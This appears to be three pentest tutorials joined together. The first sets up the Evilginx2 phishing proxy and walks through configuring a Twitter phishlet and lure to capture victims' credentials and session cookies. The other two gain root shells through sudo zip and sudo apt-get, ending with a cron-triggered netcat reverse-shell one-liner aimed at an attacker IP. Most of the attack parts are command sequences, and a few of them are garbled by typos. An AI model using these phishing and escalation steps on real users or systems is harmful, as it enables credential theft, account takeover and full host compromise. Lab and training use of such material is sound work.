Evilginx2- Advanced Phishing Attack Framework

This is the successor of Evilginx 1, and it stays in-line with the MITM lineage. This tool is designed for Phishing attack to capture login credentials and session cookie. 

Table of Content

Overview

Setup                                                                                                     

·        Perquisites

·        Installation

·        Domain Setup

·        Priming Evilginx

Execution

·        Lure Creation

·        Attack Simulation

Overview

One of the biggest concerns in todays cyber space is Phishing, it’s one of those things that uses what a user is familiar with against them. This is a MITM attack framework that sits between the user and site that they are trying to access to potentially steal their credentials. The framework is written in GO and implements its own HTTP and DNS server, making the setup process a breeze.

Setup

Let’s get acquainted with Evilginx2. The first thing we need to do is setup the Evilginx2 application on our attacking machine, let’s get the IP.

ifconfig

Perquisites

Evilginx has a few requirements before it can be installed and start working optimally, lets take of them first.

We use pscp to upload the go install file to our attacking machine, defining where it can find the file and the credentials and IP of the destination machine. Go is a prerequisite for setting up evilginx. You can get Go 1.10.0 from here.

pscp.exe c:\go1.10.linux-amd64.tar.gz root@68.183.85.197:/tmp/go1.10.linux-amd65.tar.gz

Once we have Go in out machine we unpack and install it. Pscp deposited our Go file in the tmp folder. We will now be using the following commands to install Go and check its version:

cd /tmp/

ls

tar -C /use/local -xzf go1.10.linux-amd64.tar.gz

export PATH=$PATH:/use/local/go/bin

source $HOME/ .profile

go version

Go needs to be added to ~/.profieles now, here’s how you do it:

Open the. profiles file in nano or any other text editor and type in the following

export GOPATH=$HOME/go

export PATH=$PATH:/usr/local/go/bin:$GOPATH/bin

 

Next, install git make by typing following:

apt-get install git make

Installation

Now we are ready to install Evilginx, let’s see how.

go get -u github.com/kgretzky/evilginx2

cd $GOPATH/src/github.com/kgretzky/evilginx2

make

make install

Let’s launch Evilginx by running the script.

./evilginx

There is multiple built-in option that the attacker can utilize to choose a site template called Phishlets.

Domain Setup

Evilginx works as a relay between the victim and the legitimate website that they are trying to access, to achieve this, the attacker needs a domain of their own. There are plenty of resources on the web from where a free domain can be attained temporarily, we used one such resource. We have setup an attacking domain: userid.cf.

The IP of out attacking machine is used in the IP address for the nameserver, if you recall, we noted it earlier on in the process.

Priming Evilginx

This is the part where we prime Evilginx for the attack. At the Evilginx terminal we use the help command to see the various general configuration options that it has.

help

We need to configure Evilginx to use the domain name that we have set up for it and the IP for the attacking machine.

config domain userid.cf

config ip 68.183.85.197

Time to setup the domains. We have used the twitter phishlet with our domain and Evilginx gives us options of modified domain names that we can setup in out hosting site

phishlets hostname twitter twittwer.com.userid.cf

phishlets get-hosts twitter

In our hosting site we set the A record, which will the IP of the attacking machine and then copy and paste the domain names provided by Evilginx. One thing to note here, we don’t need to copy the “userid.cf” part, we just need the preceding string.

Execution

We now have everything we need to execute a successful attack using Evilginx.

The settings have been put into place, now we can start using the tool for what it is intended

phishlets enable twitter

Lure Creation

We now need a link that the victim clicks on, in Evilginx, the term for the link is “Lures”.

The help command shows us what options we must use for setting up the lures.

help lures

The lures have to be attached with our desired phishlet and a redirect has to be set to point towards the legitimate website that we are trying to harvest credentials for. Once the lures have been configured, we can see what the configurations yield.

lures

lures create twitter

lures edit redirect_url 0 =’https://www.twitter.com’

lures

lures get-url 0

Attack Simulation

When a victim clicks on our created lure, they will be sent to out phishlet, as can be seen below.

The victim enters their credentials and we see Evilginx capturing them and relaying them to the attack machines terminal.

This is a great tool to explore and understand phishing but at the same time, be sure to use it in a controlled setting.

Linux for Pentester : ZIP Privilege Escalation

Today We are going to tell you that how can we perform Privilege Escalation with Zip command. As we all know that Zip is an easy platform-based file packaging and compression utilities for Unix-like systems like Linux, Windows, etc. The Zip program is used for compressing and packaging documents.

Table of content 

Introduction to ZIP

Major functions of ZIP command

Sudo Rights Lab setups for privilege Escalation

Exploiting Sudo rights

Introduction to ZIP

Zip is helpful for packaging a number of distribution files, archiving files, and disk storage by compressing unused files or directories momentarily. You can pack a whole directory structure into a single command zip archive. For text files, 2:1 to 3:1 compression ratio is common place. But that’s not all. What else we can do with the Zip command. Let’s think out of the box. Now we are doing something creative which might have not tried before; that is, we are trying Privilege Escalation with Zip command. Let’s understand how. In order to perform this first we will tell you what a Zip command does in Linux. So, let’s start.

Major Operations Performed Using ZIP command          

First, we will run zip -h command which means help; it tells you about all the options available in zip command as shown in the picture below.

zip -h

So, our first step is to make a directory. We will first create a directory by the name Ignite and then I will create some text files into this by using touch command.

As you can see, we have created three text files by the name of file1.txt, file2.txt, file3.txt in this folder Ignite. Now we will zip file1.txt and file3.txt and give this file a name zip file.zip followed by the file names.

After this step we will use ls -la command to check the list of the files.

Delete with -d option

-d option – It deletes the file from the zip file. You can delete a file from the archive with the -d option after generating a zip file as we did with file3.txt. We are using -d command to delete file3.txt from the zip file. So first we will specify the zip file name from where we want to delete the file.

zip -d file.zip file3.txt

Update with -u option

so, you will notice that file3.txt is deleted from the file.zip. Now we want to update the zip file and add a text file directly into the zip file. So, we will use -u option

zip -u file.zip file2.txt

by using the above command, you will notice that file2.txt is directly added into the zip file. i.e. file.zip

Move Multiple files with -m option

Now we will first create files of different extensions in our named Ignite. As you can see that we have created two files of txt, two files of pdf extension and two files of jpg extensions. So, we have files with different extensions. In order to move files of different extensions in zip file then we need to use -m option. Here you can see that we are using -m option to move all text files in zip file. So, we will run the following command-

zip -m 1.zip *.txt

As we can check through ls -la that all are txt files has been moved into zip file and as well as all the txt files are deleted from their original destination; which reflects that we have performed it successfully. So, we are now trying this on pdf and jpg files as well to move them in 1.zip zip file.

Execute system command using zip

You might have not thought of what else we can do with zip command. We can run any Linux command with zip file as we are going to do. First, we will make one txt file with touch command as we have done above. The file named raj.txt is created. Now we are trying to execute any Linux command through zip command. Run the following command along with zip file and we will get the output.

zip 1.zip raj.txt -T --unzip-command=”sh -c ifconfig”

As you can see that we have executed the system command through zip command.

Exploiting Zip

Sudo Rights Lab setups for privilege Escalation

The behaviour of zip gets changed when run with higher privilege. Let’s suppose the system admin had given sudo permission to the local user to run zip. This is can be led to privilege escalation once the system is compromised. So here we are going to put test user in the sudoers file so that test user has root the privileges to run zip command as sudo user.

Now imagine can we have Privilege shell of victim’s pc by exploiting zip program. It’s very difficult to even think of but very easy to perform. So, let’s do that. First go to kali’s terminal and connect ubuntu with ssh as we have done in below-

ssh test@192.168.1.108

Well-done. We have connected through ssh successfully.

Now we will run sudo -l command to check the list the entries of sudo files which are member of sudoers file. In the list we can see that test is a member of sudoers file and can run zip program with root privilege.

Let’s exploit!!

Now first we will create a file with touch command as we have created a file raj.txt and now we will compress the raj.txt and through zip file we are taking shell. So that we will run the following command-

sudo zip 1.zip raj.txt -T --unzip-command=”sh -c /bin/bash”   

Now we can see that we have successfully taken the shell of the victim’s machine through zip command.

Linux for Pentester : APT Privilege Escalation

In this article we'll talk about APT (apt-get) functionality and learn how helpful the apt command is for Linux peneration testing and how we'll progress apt to scale the greater privilege shell.

Table of content

Introduction to APT (apt-get)

·         Major Operation performed using APT (apt-get)

Exploiting APT (apt-get)

·         Sudo Rights Lab setups for privilege Escalation

·         Exploiting Sudo rights: Method -I

·         Exploiting Sudo rights: Method -II

·         Exploiting Sudo rights: Method -III

·         Crontab Lab setups for privilege Escalation

·         Exploiting Cron job

Introduction to APT (apt-get)

The apt command is a powerful command-line tool, which works with Ubuntu's Advanced Packaging Tool (APT) performing such functions as installation of new software packages, upgrade of existing software packages, updating of the package list index, and even upgrading the entire Ubuntu system.

Actions of the apt command, such as installation and removal of packages, are logged in the /var/log/dpkg.log log file.

For further information about the use of APT type:

apt-get -h

Major Operation performed using APT (apt-get)

·         Update the Package: The APT package index is essentially a database of available packages from the repositories defined in the /etc/apt/sources.list file and in the /etc/apt/sources.list.d directory. To update the local package index with the latest changes made in the repositories, type the following:

apt update

·         Upgrade Packages: Over time, updated versions of packages currently installed on your computer may become available from the package repositories (for example security updates). To upgrade your system, first update your package index as outlined above, and then type:

apt upgrade

apt dist-upgrade

·         Install a Package: we can Installation of packages using the apt tool which is quite easy. For example, to install the openssh-server, type the following:

apt-get install openssh-server

·         Un-install a package: we can use remove command to un-install software packages without removing their configuration files.

apt-get remove openssh-server

·         Remove Installed packet: To remove software packages including their configuration files, use the ‘purge’ sub command as shown below.

apt-get purge openssh-server

Exploiting APT (apt-get)

Sudo Rights Lab setups for privilege Escalation

The behavior of apt-get gets changed when run with higher privilege. Let’s suppose the system admin had given sudo permission to the local user to run apt-get. This is can be led to privilege escalation once the system is compromised.

First all let’s revise what is sudo Permission?

In Linux/Unix, a sudoers file inside /etc is the configuration file for sudo rights. The word sudo represent Super User Do Root privilege task. Sudoers file is that file where the users and groups with root privileges are stored to run some or all commands as root or another user.

So here, we had given sudo privilege to test user to run apt-get as root. To add sudo right open etc/sudoers file and type following as user Privilege specification.

test        ALL=(ALL) NOPASSWD: /usr/bin/apt-get

Exploiting Sudo rights: Method -I

Let’s exploit apt-get service by abusing sudo user right. Suppose we had local user access of the targeted system and we want to escalate the root user rights.

So, first we connect to target machine with ssh and type following command to get access through local user login.

ssh test@192.168.1.108

Then we look for sudo right of “test” user (if given) and found that user “test” can execute apt-get command as “root” (since he has ALL user’s right) without password.

sudo -l

To exploit sudo right through apt service we just run the following command which will invoke bash for us with root privilege as shown in the below image.

sudo apt-get update -o APT::Update::Pre-Invoke::= /bin/bash

Exploiting Sudo rights: Method-II  

We may use apt-get for viewing changes in the packaged version of a project. We can therefore enter the following command in order to call a changelog, which dumps in the editor, like Man, data relating to changes to the source package.

sudo apt-get changelog apt

This will open the console like a Man editor to read the apt change log, here we can inject “!/bin/sh” and press enter to execute bash shell for us.

You get "#" shell that means that we successfully escalated the root shell, as shown in the following picture.

Exploiting Sudo rights:  Method-III

We can use Dpkg to construct a package instead of using apt-get to invoke bin / bash. We will first build a temp file, in which we construct a packaging to call /bin / bash, and then install the package via apt-get.

TF=$(mktemp)

echo 'Dpkg::Pre-Invoke {"/bin/sh;false"}' > $TF

sudo apt-get install -c $TF sl

Crontab Lab setups for privilege Escalation

This strategy is based upon a situation in which we assume that apt.conf.d can be written in order to plan a cronjob job to update the package with the command apt-get update. As we have said, we gave /adt-conf.d complete permission.

chmod 777 apt.conf.d

ls -al

And then schedule the task using crontab to schedule an update of the software after 2 minutes every time as shown the below image

*/2 *     ***        root       apt-get update

Exploiting Cron job

Let’s exploit apt-get service by abusing cron job as we all know cron job run as root. Suppose we had access to the targeted system locally and want the root user rights to enhanced limited shell access.

So, first we connect to target machine with ssh and type following command:

ssh test@192.168.1.108

And we know apt.conf.d file has full permission as said above (You can also manually check to ensure the writable directory using find command) in the lab setup. Therefore, we will create a malicious file inside apt.conf.d by injecting netcat reverse backdoor:

echo 'apt::Update::Pre-Invoke {“rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc KALI_IP 1234 >/tmp/f”};’ > pwn

Start the netcat listener to access the reverse connection of the host machine and wait for 2 minutes to obtain the privilege shell since apt-get update task is scheduled to update the packages every time, after minute through crontab that runs as root and it runs our netcat backdoor pwn to get reverse connections as depicted in the image.

Refences:

https://gtfobins.github.io/

https://help.ubuntu.com/lts/serverguide/apt.html.en